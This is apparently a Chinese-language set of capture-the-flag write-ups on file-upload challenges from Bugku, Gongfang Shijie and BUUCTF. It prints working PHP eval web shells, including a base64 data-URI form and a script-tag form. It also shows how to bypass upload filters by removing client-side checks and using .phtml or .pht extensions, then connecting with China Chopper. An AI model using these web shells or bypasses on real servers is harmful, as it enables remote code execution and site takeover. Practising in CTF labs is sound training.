一句话木马
Bugku
1.xxx二手交易市场
进入场景都是商品看的眼花缭乱一时间没找到什么思路
看到url上有id猜是sql 构造了几个payload尝试了没反应
就注册个账号进入看看 进入个人信息看看 发现有头像上传 猜突破口在这
抓包上传个带语句的图片
发现image后面明显是base64加密过的 我们试着把一句话木马<?php @eval($_POST['123456']);?>也加密加进去得到路径 红字是图片base64加密
image=data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUWycxMjM0NTYnXSk7Pz4=
用菜刀连接得到flag
2.文件上传
直接抓包上传木马文件得到路径
关键点
菜刀连接得到flag
功防世界
1.unseping(文件上传)
进入场景 看到一个上传头像的框
上传一个一句话木马 查看路径
用菜刀连接得到flag
2.upload1(文件上传)
进入场景发现一个文件上传的界面
直接上传木马文件试一试 上传键失效了
我们看源代码是js限制了PHP上传只允许jpg png 上传
知道了这个 我们两种方法可以绕过上传
- 可以通过抓包绕过
- 修改前端“上传“的hdml属性
- 禁止js脚步运行
我们用第二种方法方便 先删除οnchange="check()“;这个元素 上传 得到路径
菜刀连接得到flag
Buuctf
[极客挑战]
1.knife
看见页面提示可能是使用中国菜刀进行连接
2.upload
文件上传漏洞——图片木马
上传一个图片里面包含一句话木马
发现对一句话木马的<?进行了过滤
这里采用脚本风格的一句话木马
<script language="php">
eval($_POST['cmd']);
</script>
但是!!!!!要把上传文件的后缀名改成php才能连接进去
题目对尾缀PHP进行了过滤
php3,pht,phtml,phps等后缀如果服务器是apach的话配置文件是可以添加这些php别名进行解析的
这里使用phtml进行绕过
上传成功
现在进行远程连接
找到flag值
3.Upload
文件上传——图片木马
对后缀名进行过滤用BP抓包修改后缀
但是直接用PHP后缀会被过滤这里使用pht后缀上传
用中国菜刀远程连接即可